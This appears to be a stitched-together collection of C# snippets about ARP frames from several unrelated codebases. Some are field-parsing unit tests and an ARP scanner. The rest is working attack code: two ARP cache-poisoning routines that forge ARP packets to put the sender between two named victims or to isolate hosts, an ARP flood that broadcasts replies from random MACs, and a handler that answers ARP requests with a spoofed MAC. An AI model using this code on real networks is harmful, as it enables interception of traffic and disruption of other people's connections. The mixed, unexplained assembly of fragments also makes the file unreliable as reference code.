/// <summary> /// Checks a frame for ARP requests and handles the ARP request /// </summary> /// <param name="fFrame">The frame to check for ARP requests</param> protected void HandleARP(Frame fFrame) { ARPFrame arpFrame = GetARPFrame(fFrame); if (arpFrame != null && arpFrame.Operation == ARPOperation.Request && base.ContainsAddress(arpFrame.DestinationIP)) { EthernetFrame ethReplyFrame = new EthernetFrame(); ethReplyFrame.Destination = arpFrame.SourceMAC; ethReplyFrame.Source = this.PrimaryMACAddress; ethReplyFrame.EtherType = EtherType.ARP; ARPFrame arpReplyFrame = new ARPFrame(); arpReplyFrame.SourceIP = arpFrame.DestinationIP; arpReplyFrame.SourceMAC = this.macprimarySpoofAddress; arpReplyFrame.DestinationMAC = arpFrame.SourceMAC; arpReplyFrame.DestinationIP = arpFrame.SourceIP; arpReplyFrame.Operation = ARPOperation.Reply; arpReplyFrame.HardwareAddressType = HardwareAddressType.Ethernet; arpReplyFrame.ProtocolAddressType = EtherType.IPv4; ethReplyFrame.EncapsulatedFrame = arpReplyFrame; this.Send(ethReplyFrame); } }
/// <summary> /// Analyzes the input frame for new information. /// </summary> /// <param name="fInputFrame">The frame to analyze</param> protected override void HandleTraffic(Frame fInputFrame) { ARPFrame arpFrame = GetARPFrame(fInputFrame); Ethernet.EthernetFrame ethFrame = GetEthernetFrame(fInputFrame); IP.IPFrame ipFrame = GetIPv4Frame(fInputFrame); if (arpFrame != null) { if (arpFrame.Operation == ARPOperation.Request) { ProcessAdresses(arpFrame.SourceIP, arpFrame.SourceMAC); } if (arpFrame.Operation == ARPOperation.Reply) { ProcessAdresses(arpFrame.SourceIP, arpFrame.SourceMAC); } } if (ethFrame != null && ipFrame != null) { ProcessAdresses(ipFrame.SourceAddress, null); ProcessAdresses(ipFrame.DestinationAddress, null); } }
public void Attack(uint frameCount) { EthernetFrame ethFrame; ARPFrame arpFrame; for (uint i = 0; i < frameCount; i++) { foreach (EthernetInterface ipi in lInterfaces) { MACAddress sourceMAC = MACAddress.Random; ethFrame = new EthernetFrame(); ethFrame.CanocialFormatIndicator = false; ethFrame.Destination = MACAddress.Broadcast; ethFrame.Source = sourceMAC; ethFrame.VlanTagExists = false; ethFrame.EtherType = EtherType.ARP; arpFrame = new ARPFrame(); arpFrame.DestinationIP = new IPAddress(0); arpFrame.DestinationMAC = MACAddress.Random; arpFrame.SourceIP = IPAddress.Parse("0.0.0.0"); arpFrame.SourceMAC = sourceMAC; arpFrame.ProtocolAddressType = EtherType.IPv4; arpFrame.HardwareAddressType = HardwareAddressType.Ethernet; arpFrame.Operation = ARPOperation.Reply; ethFrame.EncapsulatedFrame = arpFrame; ipi.Send(ethFrame); } } }
public void Get() { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame.SetBytes(24, 4, new Byte[] { 0xC0, 0xA8, 0x01, 0x01 }); arpFrame.TargetIPAddress.ToString().Should().Be("192.168.1.1"); }
public void Get(Byte[] input, ARPOperationCode expected) { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame.SetBytes(6, 2, input); arpFrame.OperationCode.Should().Be(expected); }
public void Get() { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame.SetBytes(18, 6, new Byte[] { 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC }); arpFrame.TargetMACAddress.ToString().Should().Be("12:34:56:78:9A:BC"); }
public void Get(Byte input, Byte expected) { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame.SetByte(4, input); arpFrame.HardwareAddressLength.Should().Be(expected); }
public void Set(Byte expected, Byte input) { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame.ProtocolAddressLength = input; arpFrame.GetByte(5).Should().Equals(expected); arpFrame.ProtocolAddressLength.Should().Be(expected); }
/// <summary> /// Receives an ARP frame from the ARP scan task and pushes it to the out queue of the according interface /// </summary> /// <param name="fInputFrame">The frame to receive</param> protected override void HandleTraffic(Frame fInputFrame) { ARPFrame fARPFrame = this.GetARPFrame(fInputFrame); if (fARPFrame != null) { foreach (EthernetInterface ipi in GetInterfacesForAddress(fARPFrame.DestinationIP)) { ipi.Send(fARPFrame, fARPFrame.DestinationIP, EtherType.ARP); } } }
public void Set(Byte[] expected, EthernetFrameType input) { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame.ProtocolType = input; arpFrame.GetBytes(2, 2).ToArray().Should().Equal(expected); arpFrame.ProtocolType.Should().Be(input); }
public void Get() { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame[14, 4] = new Byte[] { 0xC0, 0xA8, 0x01, 0x02 }; arpFrame.SenderIPAddress.ToString().Should().Be("192.168.1.2"); }
public void Set(Byte[] expected, HardwareType input) { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame.HardwareType = input; arpFrame.GetBytes(0, 2).ToArray().Should().Equal(expected); arpFrame.HardwareType.Should().Be(input); }
public void Set(Byte[] expected, ARPOperationCode input) { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame.OperationCode = input; arpFrame.GetBytes(6, 2).ToArray().Should().Equal(expected); arpFrame.OperationCode.Should().Be(input); }
public void Get(Byte[] input, HardwareType expected) { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame.SetBytes(0, 2, input); arpFrame.HardwareType.Should().Be(expected); }
public void Get(Byte[] input, EthernetFrameType expected) { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame.SetBytes(2, 2, input); arpFrame.ProtocolType.Should().Be(expected); }
protected override void Scan(IPAddress ipaDestination) { ARPFrame arpFrame = new ARPFrame(); arpFrame.DestinationIP = ipaDestination; arpFrame.SourceIP = SourceAddress; arpFrame.DestinationMAC = MACAddress.Parse("ff:ff:ff:ff:ff:ff"); arpFrame.SourceMAC = macLocal; arpFrame.ProtocolAddressType = EtherType.IPv4; arpFrame.HardwareAddressType = HardwareAddressType.Ethernet; arpFrame.Operation = ARPOperation.Request; OutputHandler.PushTraffic(arpFrame); }
public void Set() { var arpFrame = new ARPFrame { Bytes = new Byte[28] }; arpFrame.SenderMACAddress = new MACAddress { Bytes = new Byte[] { 0x21, 0x43, 0x65, 0x87, 0xA9, 0xCB } }; arpFrame.SenderMACAddress.ToString().Should().Be("21:43:65:87:A9:CB"); }
public void arp_request_frame() { var arpFrame = new ARPFrame { Bytes = buildARPBytes() }; arpFrame.HardwareType.Should().Be(HardwareType.Ethernet); arpFrame.ProtocolType.Should().Be(EthernetFrameType.IPv4); arpFrame.HardwareAddressLength.Should().Be(6); arpFrame.ProtocolAddressLength.Should().Be(4); arpFrame.OperationCode.Should().Be(ARPOperationCode.Request); arpFrame.SenderMACAddress.ToString().Should().Be("12:34:56:78:9A:BC"); arpFrame.SenderIPAddress.ToString().Should().Be("192.168.1.2"); arpFrame.TargetMACAddress.ToString().Should().Be("00:00:00:00:00:00"); arpFrame.TargetIPAddress.ToString().Should().Be("192.168.1.1"); }
private void Poison() { EthernetFrame ethFrame; ARPFrame arpFrame; lock (ipaToIsolate) { foreach (ARPHostEntry heToIsolate in ipaToIsolate) { lock (ipaToSpoof) { foreach (ARPHostEntry heToSpoof in ipaToSpoof) { if (heToIsolate != heToSpoof) { ethFrame = new EthernetFrame(); ethFrame.CanocialFormatIndicator = false; ethFrame.Destination = heToIsolate.MAC; ethFrame.Source = macAddressRedirectTo; ethFrame.VlanTagExists = false; ethFrame.EtherType = EtherType.ARP; arpFrame = new ARPFrame(); arpFrame.DestinationIP = heToIsolate.IP; arpFrame.DestinationMAC = MACAddress.Parse("00:00:00:00:00:00"); arpFrame.SourceIP = heToSpoof.IP; arpFrame.SourceMAC = macAddressRedirectTo; arpFrame.ProtocolAddressType = EtherType.IPv4; arpFrame.HardwareAddressType = HardwareAddressType.Ethernet; arpFrame.Operation = ARPOperation.Request; ethFrame.EncapsulatedFrame = arpFrame; wpc.SendPacket(ethFrame.FrameBytes); } } } } } }
private void Poison() { EthernetFrame ethFrame; ARPFrame arpFrame; lock (lVictims) { foreach (EthernetInterface ipi in lInterfaces) { foreach (MITMAttackEntry aprVictim in lVictims) { if (!ipi.ARPTable.Contains(aprVictim.VictimBob) || !ipi.ARPTable.Contains(aprVictim.VictimAlice)) { continue; } //Poisoning Victim 1 ethFrame = new EthernetFrame(); ethFrame.CanocialFormatIndicator = false; ethFrame.Destination = ipi.ARPTable.GetEntry(aprVictim.VictimBob).MAC; ethFrame.Source = ipi.PrimaryMACAddress; ethFrame.VlanTagExists = false; ethFrame.EtherType = EtherType.ARP; arpFrame = new ARPFrame(); arpFrame.DestinationIP = aprVictim.VictimBob; if (aprMethod == APRAttackMethod.UseRequestPackets) { arpFrame.DestinationMAC = MACAddress.Parse("00:00:00:00:00:00"); } else { arpFrame.DestinationMAC = ipi.ARPTable.GetEntry(aprVictim.VictimBob).MAC; } arpFrame.SourceIP = aprVictim.VictimAlice; arpFrame.SourceMAC = ipi.PrimaryMACAddress; arpFrame.ProtocolAddressType = EtherType.IPv4; arpFrame.HardwareAddressType = HardwareAddressType.Ethernet; if (aprMethod == APRAttackMethod.UseRequestPackets) { arpFrame.Operation = ARPOperation.Request; } else { arpFrame.Operation = ARPOperation.Reply; } ethFrame.EncapsulatedFrame = arpFrame; ipi.Send(ethFrame); //Poisoning Victim 2 ethFrame = new EthernetFrame(); ethFrame.CanocialFormatIndicator = false; ethFrame.Destination = ipi.ARPTable.GetEntry(aprVictim.VictimAlice).MAC; ethFrame.Source = ipi.PrimaryMACAddress; ethFrame.VlanTagExists = false; ethFrame.EtherType = EtherType.ARP; arpFrame = new ARPFrame(); arpFrame.DestinationIP = aprVictim.VictimAlice; if (aprMethod == APRAttackMethod.UseRequestPackets) { arpFrame.DestinationMAC = MACAddress.Parse("00:00:00:00:00:00"); } else { arpFrame.DestinationMAC = ipi.ARPTable.GetEntry(aprVictim.VictimAlice).MAC; } arpFrame.SourceIP = aprVictim.VictimBob; arpFrame.SourceMAC = ipi.PrimaryMACAddress; arpFrame.ProtocolAddressType = EtherType.IPv4; arpFrame.HardwareAddressType = HardwareAddressType.Ethernet; if (aprMethod == APRAttackMethod.UseRequestPackets) { arpFrame.Operation = ARPOperation.Request; } else { arpFrame.Operation = ARPOperation.Reply; } ethFrame.EncapsulatedFrame = arpFrame; ipi.Send(ethFrame); } } } InvokePoisoned(); }
public void Display(ARPFrame arpFrame) { NewLine($"arp : {arpFrame.SenderMACAddress,-17} {arpFrame.SenderIPAddress,-15} > {arpFrame.TargetMACAddress,17} {arpFrame.TargetIPAddress,-15} operation_code={arpFrame.OperationCode}"); }